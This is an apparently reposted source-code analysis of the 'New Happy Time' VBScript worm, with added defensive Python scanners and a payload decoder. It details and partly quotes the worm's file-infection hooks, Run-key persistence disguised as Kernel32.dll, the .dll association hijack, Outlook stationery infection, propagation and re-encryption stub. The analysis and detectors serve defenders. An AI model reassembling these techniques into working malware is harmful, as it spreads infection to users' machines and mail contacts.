[Repost] "New Happy Time" Virus Source Code Analysis

xiaoxiao, 2021-03-06

Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk

Sub KJ_Start()
    ' initialize variables
    KJSetDim()
    ' initialize the environment
    KJCreateMilieu()
    ' infect the directory of a locally opened or shared HTML file
    KJLikeIt()
    ' infect the Outlook mail templates with the VBS body
    KJCreateMail()
    ' propagate the virus
    KJPropagate()
End Sub

' Function: KJAppendTo(FilePath, TypeStr)
' Purpose: append the virus body, in the specified form, to the specified file
' Parameters:
'   FilePath  path of the file to infect
'   TypeStr   form of the body to add: "htt", "html" or "vbs"

The function runs under On Error Resume Next. It opens FilePath for reading (OpenTextFile mode 1) and reads the whole file into TmpStr. If the contents already contain the string "KJ_Start()" the file has been infected before, and if the length is below 1 the file is empty; in both cases the file is closed and the function exits, so "KJ_Start()" doubles as the worm's re-infection guard.

What is written then depends on TypeStr:

- "htt": the file is reopened for writing (mode 2, which truncates it) and rewritten as <Body onload="vbscript:KJ_Start()">, a line break, the original contents, another line break and HtmlText, the HTML form of the encrypted body. The file's attributes are then set to 34 (hidden + archive).
- "html": the file is reopened for appending (mode 8) and <HTML>, <Body onload="vbscript:KJ_Start()"> and HtmlText are added at the end, so the hook fires when the page is loaded.
- "vbs": the file is reopened for appending and VbsText, the VBS form of the body, is added at the end.
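A scanner for the carrier shapes this function produces, as an added example written for this page (it is neither the worm's code nor part of the original analysis): it flags the "KJ_Start()" guard string, the onload hook at the head of an HTT file or appended to an HTML-family file, and the VBScript block. The regexes, function names and sample page contents are my own constructions.

```python
import os
import re

# The string the worm tests for before appending itself; it is both its
# re-infection guard and the simplest signature for carriers.
INFECTION_MARKER = "kj_start()"

# Shapes of the two injections described above (assumed regexes, not from the page).
BODY_ONLOAD = re.compile(
    r'<body[^>]*\bonload\s*=\s*["\']?\s*vbscript:\s*kj_start\s*\(\s*\)', re.I)
VBS_SCRIPT_TAG = re.compile(r'<script[^>]*\blanguage\s*=\s*["\']?\s*vbscript', re.I)

# Extensions the worm treats as HTML carriers (from KJummageFolder).
HTML_LIKE = {"htm", "html", "asp", "php", "jsp"}


def scan_text(text, ext):
    """Return the indicator names found in one file's contents.

    ext is the extension without the dot. Empty files can never be carriers,
    because KJAppendTo skips anything with Len < 1.
    """
    ext = ext.lower()
    findings = []
    if len(text) < 1:
        return findings
    if INFECTION_MARKER in text.lower():
        findings.append("marker")
    if ext == "htt" and BODY_ONLOAD.match(text.lstrip()):
        # HTT carriers get the hook prepended, so it is the first tag in the file.
        findings.append("htt_head_hook")
    if ext in HTML_LIKE and BODY_ONLOAD.search(text):
        # HTML carriers get a second <HTML><Body onload=...> appended.
        findings.append("html_onload_hook")
    if (ext in HTML_LIKE or ext == "htt") and VBS_SCRIPT_TAG.search(text):
        findings.append("vbscript_block")
    if ext == "vbs" and "marker" in findings:
        findings.append("vbs_appended_body")
    return findings


def is_infected(text, ext):
    return "marker" in scan_text(text, ext)


def scan_tree(root):
    """Walk a directory and return {path: findings} for every flagged file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lstrip(".")
            if ext.lower() not in HTML_LIKE | {"htt", "vbs"}:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1", errors="replace") as fh:
                found = scan_text(fh.read(), ext)
            if found:
                hits[path] = found
    return hits


# Constructed samples standing in for a clean page and three carriers.
CLEAN_HTML = "<html><body><p>hello</p></body></html>"
HOOK = '<Body onload="vbscript:KJ_Start()">'
PAYLOAD = "<script language=vbscript>\r\n' (encrypted body would follow here)\r\n</script>"
INFECTED_HTML = CLEAN_HTML + "\r\n<HTML>\r\n" + HOOK + "\r\n" + PAYLOAD
INFECTED_HTT = HOOK + "\r\n<html><body></body></html>\r\n" + PAYLOAD
INFECTED_VBS = "' original script\r\nMsgBox \"hi\"\r\n' ... KJ_Start() ..."

if __name__ == "__main__":
    for label, text, ext in [("clean", CLEAN_HTML, "html"), ("html", INFECTED_HTML, "html"),
                             ("htt", INFECTED_HTT, "htt"), ("vbs", INFECTED_VBS, "vbs")]:
        print(label, scan_text(text, ext))
```

The marker check alone is enough to decide infection; the other findings tell a responder which injection form was used and therefore which form of cleanup (strip the appended tail, or restore the HTT head) applies.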

' Function: KJChangeSub(CurrentString, LastIndexChar)
' Purpose: change the drive letter or step back up one subdirectory
' Parameters:
'   CurrentString  the current directory
'   LastIndexChar  position of the last path separator in the current directory path

The function first tests LastIndexChar = 0 to decide whether CurrentString is a drive root. At the root, if the drive is C:\ it wraps around to the last usable drive, FinalyDisk, and resets the subdirectory state; the test begins Left(LCase(CurrentString), 1) = [the remainder of the function is truncated in the source].

' Function: KJCreateMail()
' Purpose: infect the mail stationery used by Outlook Express and Outlook

If the current carrier is an HTML file (InWhere = "html") the function exits at once; this part only runs from the VBS carrier. ShareFile is the blank stationery page on the system drive, Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm". If the file exists, KJAppendTo(ShareFile, "HTML") appends the HTML body to it; otherwise the file is created (OpenTextFile mode 2, create = True) and written as <HTML>, <Body onload="vbscript:KJ_Start()"> and HtmlText.

The current identity and the Outlook Express version are then read from the registry:

  DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
  OutlookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")

With those, stationery is switched on and pointed at the infected page. Under HKEY_CURRENT_USER\Identities\<DefaultId>\Software\Microsoft\Outlook Express\<major>.0\Mail (major is Left(OutlookVersion, 1)) the function writes Compose Use Stationery = 1 (REG_DWORD) and, through KJMailReg, sets Stationery Name and Wide Stationery Name to ShareFile. For Outlook it writes:

  HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference = 131072 (REG_DWORD)
  HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360 = "blank" (through KJMailReg)
  HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360 = "blank" (through KJMailReg)
  HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference = 131072 (REG_DWORD)
  HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery = "blank" (through KJMailReg)

Finally KJummageFolder(Left(WinPath, 3) & "Program Files\Stationry") infects every template in that directory, so new HTML messages composed with Outlook Express or Outlook carry the body.

' Function: KJCreateMilieu()
' Purpose: set up the system environment (startup file, folder template and registry changes)

TempPath starts empty. If WinPath & "Wscript.exe" does not exist the system is NT/2000, where the script host lives under System32, and TempPath becomes "System32\"; on 9X it stays empty. The source comment notes that the file names below were chosen to look like system files without colliding with real ones.

The startup file is WinPath & "System\Kernel32.dll" on NT/2000 (TempPath = "System32\") and WinPath & "System\Kernel.dll" on 9X. Its path is written to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32 so that it runs at every logon.

Backup copies of the earlier-dropped files are then made and the folder template is infected:

  fso.CopyFile WinPath & "Web\KJWALL.GIF", WinPath & "Web\Folder.htt"
  fso.CopyFile WinPath & "System32\KJWALL.GIF", WinPath & "System32\Desk.ini"
  Call KJAppendTo(WinPath & "Web\Folder.htt", "HTT")

The .dll file type is then rebound so that the startup file, although named .dll, is handed to the script host. The values written are:

  HKEY_CLASSES_ROOT\.dll\ (default) = "dllfile"
  HKEY_CLASSES_ROOT\.dll\Content Type = "application/x-msdownload"
  HKEY_CLASSES_ROOT\dllfile\DefaultIcon\ (default) = the value read from HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\
  HKEY_CLASSES_ROOT\dllfile\ScriptEngine\ (default) = "vbscript"
  HKEY_CLASSES_ROOT\dllfile\Shell\Open\Command\ (default) = WinPath & TempPath & "WScript.exe ""%1"" %*"
  HKEY_CLASSES_ROOT\dllfile\ShellEx\PropertySheetHandlers\WSHProps\ (default) = "{60254CA5-953B-11CF-8C96-00AA00B8708C}"
  HKEY_CLASSES_ROOT\dllfile\ScriptHostEncode\ (default) = "{85131631-480C-11D2-B1F9-00C04F86C324}"

"dllfile" and the application/x-msdownload content type are the stock values for .dll, so the entries that give the change away are ScriptEngine and the open command pointing at WScript.exe. Last, the VBS body is written to the startup file:

  Set FileTemp = fso.OpenTextFile(StartUpFile, 2, True)
  FileTemp.Write VbsText
  FileTemp.Close
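The registry writes made by KJCreateMail and KJCreateMilieu are the host-based indicators a responder would look for. The following is an added example, not code from the page or from the original analysis: it parses a constructed excerpt in the style of a "reg export" file (format and sample data assumed; the identity GUID is a placeholder) and reports the three indicator groups described above, while treating the stock "dllfile" ProgID as benign on its own.

```python
import re

# Constructed registry-export excerpt (assumed format); the key names and data
# are the ones listed in the analysis above, the identity GUID is a placeholder.
SAMPLE_EXPORT = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Kernel32"="C:\\WINNT\\System\\Kernel32.dll"

[HKEY_CLASSES_ROOT\.dll]
@="dllfile"
"Content Type"="application/x-msdownload"

[HKEY_CLASSES_ROOT\dllfile\ScriptEngine]
@="vbscript"

[HKEY_CLASSES_ROOT\dllfile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"

[HKEY_CURRENT_USER\Identities\{IDENTITY-GUID-PLACEHOLDER}\Software\Microsoft\Outlook Express\5.0\Mail]
"Compose Use Stationery"=dword:00000001
"Stationery Name"="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\blank.htm"
'''

# A clean machine: the stock .dll association carries the same ProgID and content type.
CLEAN_EXPORT = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Program Files\\Example\\updater.exe"

[HKEY_CLASSES_ROOT\.dll]
@="dllfile"
"Content Type"="application/x-msdownload"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')


def _decode_data(raw):
    """Turn the textual data of one value into a str or int."""
    if raw.startswith('"') and raw.endswith('"'):
        return re.sub(r'\\(.)', r'\1', raw[1:-1])   # unescape \\ and \"
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return raw


def parse_reg_export(text):
    """Return {(key_path, value_name): data}; the default value has name ''."""
    values = {}
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            values[(key, m.group(1) or "")] = _decode_data(m.group(2))
    return values


def check_indicators(values):
    """Return the names of the indicators from the analysis that are present."""
    found = []
    lower = {(k.lower(), n.lower()): v for (k, n), v in values.items()}

    # 1. Run entry pointing at the script dropped as System\Kernel32.dll or System\Kernel.dll.
    for (key, _name), data in lower.items():
        if key.endswith(r"\currentversion\run") and isinstance(data, str) \
                and data.lower().endswith((r"\system\kernel32.dll", r"\system\kernel.dll")):
            found.append("run_key_kernel_dll")
            break

    # 2. The .dll ProgID is normally "dllfile", so the hijack shows in ScriptEngine
    #    and in an open command that hands the file to WScript.exe.
    if lower.get((r"hkey_classes_root\.dll", "")) == "dllfile":
        engine = lower.get((r"hkey_classes_root\dllfile\scriptengine", ""), "")
        cmd = lower.get((r"hkey_classes_root\dllfile\shell\open\command", ""), "")
        if engine == "vbscript" or "wscript.exe" in str(cmd).lower():
            found.append("dll_association_script_hijack")

    # 3. An Outlook Express identity forced to compose with the blank.htm stationery.
    for (key, name), data in lower.items():
        if re.search(r"\\outlook express\\\d\.0\\mail$", key) and name == "stationery name" \
                and isinstance(data, str) and data.lower().endswith(r"\blank.htm") \
                and lower.get((key, "compose use stationery")) == 1:
            found.append("oe_blank_stationery_forced")
            break
    return found


if __name__ == "__main__":
    print(check_indicators(parse_reg_export(SAMPLE_EXPORT)))
    print(check_indicators(parse_reg_export(CLEAN_EXPORT)))
```

Feeding the parser a real export of HKCR\.dll, HKCR\dllfile, the Run key and the Identities hive reproduces the check on a live image; the Office EditorPreference and 001e0360 values from KJCreateMail could be added to the third group in the same way.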

' Function: KJLikeIt()
' Purpose: handle the HTML carrier; if the page was opened from a local or shared file, infect its directory

If the current carrier is not an HTML file (InWhere <> "html") the function exits. ThisLocation is taken from document.location; if it refers to a local or network-shared file (the location starts with "file:") the scheme prefix is stripped with Mid(ThisLocation, 9). If fso.GetExtensionName(ThisLocation) is not empty, the file name is removed so that ThisLocation holds only the directory: Left(ThisLocation, Len(ThisLocation) - Len(fso.GetFileName(ThisLocation))). If Len(ThisLocation) is greater than 3, i.e. the path is more than a bare drive root, that directory is processed [the call is truncated in the source].

' Function: KJMailReg(RegStr, FileName)
' Purpose: if the specified registry value does not exist, write the specified file name to it
' Parameters:
'   RegStr    the registry value to check
'   FileName  the file name to write

Under On Error Resume Next it reads RegTempStr = WsShell.RegRead(RegStr); if RegTempStr = "" the value is missing and FileName is written to RegStr [the write is truncated in the source].

' Function: KJOboSub(CurrentString)
' Purpose: advance one step through the directory tree and return the next directory path
' Parameter:
'   CurrentString  the current directory

SubE and TestOut start at 0. The function loops, incrementing TestOut on each pass; after 28 passes it gives up, sets CurrentString = FinalyDisk & ":\" and leaves the loop. Each pass, under On Error Resume Next, takes the SubFolders of fso.GetFolder(CurrentString) and stores their names in a Scripting.Dictionary, DicSub, numbered from 1, with FolderCount as the count.

- If DicSub.Count = 0 (no subdirectory): LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1) and SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1) pick out the last path component, CurrentString = KJChangeSub(CurrentString, LastIndexChar) steps up a level or changes drive, and SubE is set to 1.
- Otherwise, if SubE = 0, the walk descends: CurrentString = CurrentString & DicSub.Item(1) & "\" and the loop exits.
- Otherwise (SubE = 1, the walk has just come back up) it searches j = 1 To FolderCount for the child it came from, LCase(SubString) = LCase(DicSub.Item(j)), in order to move on to the next sibling [the rest of the loop is truncated in the source].

' Function: KJPropagate()
' Purpose: spread the virus across the disk

Under On Error Resume Next, the progress marker is read from RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree" into DiskDegree. If the Degree value does not exist the walk starts at the root of the last usable drive, DiskDegree = FinalyDisk & ":\". Five directories are then processed per run:

  For i = 1 To 5
      DiskDegree = KJOboSub(DiskDegree)
      KJummageFolder(DiskDegree)
  Next

and the position reached is written back with WsShell.RegWrite RegPathValue, DiskDegree, so each execution resumes where the previous one stopped. Spreading only five directories at a time keeps each run short and inconspicuous.

' Function: KJummageFolder(PathName)
' Purpose: infect the specified directory
' Parameter:
'   PathName  the directory to infect

Under On Error Resume Next the function takes fso.GetFolder(PathName).Files and sets HttExists = 0. For each file it uppercases fso.GetExtensionName(ThisFile.Path) and acts by extension:

- HTM, HTML, ASP, PHP or JSP: Call KJAppendTo(ThisFile.Path, "HTML") adds the HTML form of the body.
- VBS: Call KJAppendTo(ThisFile.Path, "VBS") adds the VBS form.
- HTT: HttExists = 1, marking that the directory already has a folder template.

If PathName is the desktop (UCase(PathName) = UCase(WinPath & "Desktop")) HttExists is also set to 1. When HttExists is still 0, the two template files are dropped into the directory:

  fso.CopyFile WinPath & "System32\Desktop.ini", PathName
  fso.CopyFile WinPath & "Web\Folder.htt", PathName

so that merely viewing the folder in Explorer runs the infected Folder.htt.

' Function: KJSetDim()
' Purpose: define the FSO and WsShell objects, find the last available disk, and generate the encrypted
' infection strings together with Web\Folder.htt and System32\Desktop.ini

The function opens with On Error Resume Next and Err.Clear.

' Detect whether the current carrier is HTML or VBS

The carrier type is found by probing the script host: Testit = WScript.ScriptFullName. Inside a browser there is no WScript object, so the call raises an error and InWhere = "html"; otherwise InWhere = "VBS".

' Create the shell and file-system objects

From the VBS carrier they are created directly:

  Set FSO = CreateObject("Scripting.FileSystemObject")
  Set WsShell = CreateObject("WScript.Shell")

From the HTML carrier the same objects are obtained through the applet named KJ_guest on the page: Set AppleObject = document.applets("KJ_guest"), then AppleObject.setCLSID "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}" (WScript.Shell), AppleObject.createInstance() and Set WsShell = AppleObject.GetObject(); the sequence is repeated with "{0D43FE01-F093-11CF-8940-00A0C9054228}" (Scripting.FileSystemObject) to obtain FSO.

' Find the last usable disk

The function walks FSO.Drives. DriveType values are 0 unknown, 1 removable, 2 fixed, 3 network, 4 CD-ROM, 5 RAM disk. The loop leaves as soon as a drive is neither fixed nor removable (DriveType <> 2 And DriveType <> 1); otherwise FinalyDisk = DiskTemp.DriveLetter, so FinalyDisk ends up as the last fixed or removable drive before any network, CD-ROM or RAM drive. The source comment says network drives, CD-ROMs and RAM disks were deliberately treated as unrewarding places to infect, and wonders what happens if C: is a RAM disk.

' Re-encrypt the body

The body was decrypted into ThisText when the carrier ran; to spread, it has to be encrypted again with fresh keys. Four operators are drawn at random:

  Dim OtherArr(3)
  Randomize
  For i = 0 To 3
      OtherArr(i) = Int(9 * Rnd)
  Next

Then, for i = 1 To Len(ThisText), TempNum = Asc(Mid(ThisText, i, 1)); a carriage return (13) is replaced by 28 and a line feed (10) by 29 so the result stays on a single line. The operator for the position is subtracted from each character, TempChar = Chr(TempNum - OtherArr(i Mod 4)); if the result is a double quote, Chr(34), it is stored as Chr(18) so that the encrypted text can sit inside a VBScript string literal. The characters are accumulated in TempString. Decryption is the mirror image: add the operator for the same position back to each character in the same order.

' Build the decryption stub

UnlockStr is the stub placed in front of the encrypted body. Wrapped in Execute(...), it declares Dim KeyArr(3), ThisText, assigns KeyArr(0) to KeyArr(3) the four values of OtherArr, and loops For i = 1 To Len(ExeString): TempNum = Asc(Mid(ExeString, i, 1)); if TempNum = 18 it becomes 34; TempChar = Chr(TempNum + KeyArr(i Mod 4)); Chr(28) is turned back into vbCr and Chr(29) into vbLf; ThisText = ThisText & TempChar. After the loop, Execute(ThisText) runs the recovered body.

The encrypted body is then stored in ThisText as the assignment ExeString = "<TempString>", and HtmlText, the script for HTML infection, begins with <script language=vbscript> followed by document.write "< [the remainder of the string is truncated in the source].
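Because the stub carries its four operators in clear text, an analyst can recover the body from a carrier without running it. The following decoder is an added example written for this page, not the worm's code and not from the original analysis: it pulls KeyArr(0..3) and the ExeString literal out of a stub and inverts the per-position subtraction with the same 18/34 and 28/29 substitutions. The sample stub, its keys (3, 1, 4, 1) and its ExeString bytes are constructed test values; the function and pattern names are my own.

```python
import re

# Constructed sample of the stub that precedes the encrypted body. The keys and
# the ExeString bytes are test values chosen so the expected plaintext is known.
SAMPLE_STUB = (
    'ExeString = "w9!.!\x18\x1c"\r\n'
    'Execute("Dim KeyArr(3), ThisText" & vbCrLf & '
    '"KeyArr(0) = 3" & vbCrLf & "KeyArr(1) = 1" & vbCrLf & '
    '"KeyArr(2) = 4" & vbCrLf & "KeyArr(3) = 1" & vbCrLf & "Execute(ThisText)")'
)

# Assignments of the form KeyArr(n) = value; the Dim KeyArr(3) declaration
# has no "=" after the parenthesis and so does not match.
KEY_RE = re.compile(r'KeyArr\s*\(\s*([0-3])\s*\)\s*=\s*(\d+)', re.I)
EXE_RE = re.compile(r'ExeString\s*=\s*"([^"]*)"', re.I)


def extract_keys(stub):
    """Recover KeyArr(0..3) from the plain-text assignments in the stub."""
    keys = [None] * 4
    for idx, val in KEY_RE.findall(stub):
        keys[int(idx)] = int(val)
    if None in keys:
        raise ValueError("stub does not assign all four keys")
    return keys


def extract_exestring(stub):
    """Pull the quoted ExeString literal.

    The worm maps any double quote in the encrypted text to Chr(18), so the
    literal never contains an embedded quote and a plain [^"]* match suffices.
    """
    m = EXE_RE.search(stub)
    if not m:
        raise ValueError("no ExeString literal found")
    return m.group(1)


def decode(exe_string, keys):
    """Invert the per-position subtraction exactly as the worm's stub does."""
    out = []
    for i, ch in enumerate(exe_string, start=1):   # VBScript's loop counts from 1
        n = ord(ch)
        if n == 18:                 # Chr(18) stands in for a double quote
            n = 34
        c = chr(n + keys[i % 4])
        if c == chr(28):            # CR was folded to 28 before encryption
            c = "\r"
        elif c == chr(29):          # LF was folded to 29
            c = "\n"
        out.append(c)
    return "".join(out)


def recover_payload(stub):
    """Return (keys, plaintext) for a stub plus its ExeString."""
    keys = extract_keys(stub)
    return keys, decode(extract_exestring(stub), keys)


if __name__ == "__main__":
    keys, text = recover_payload(SAMPLE_STUB)
    print(keys, repr(text))
```

The operators are Int(9 * Rnd), so only 9^4 combinations exist; if a carrier's stub were damaged, trying all of them and keeping the one whose output contains "KJ_Start" would recover the body just as well.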

Please cite the original address when reposting: https://www.9cbs.com/read-114706.html
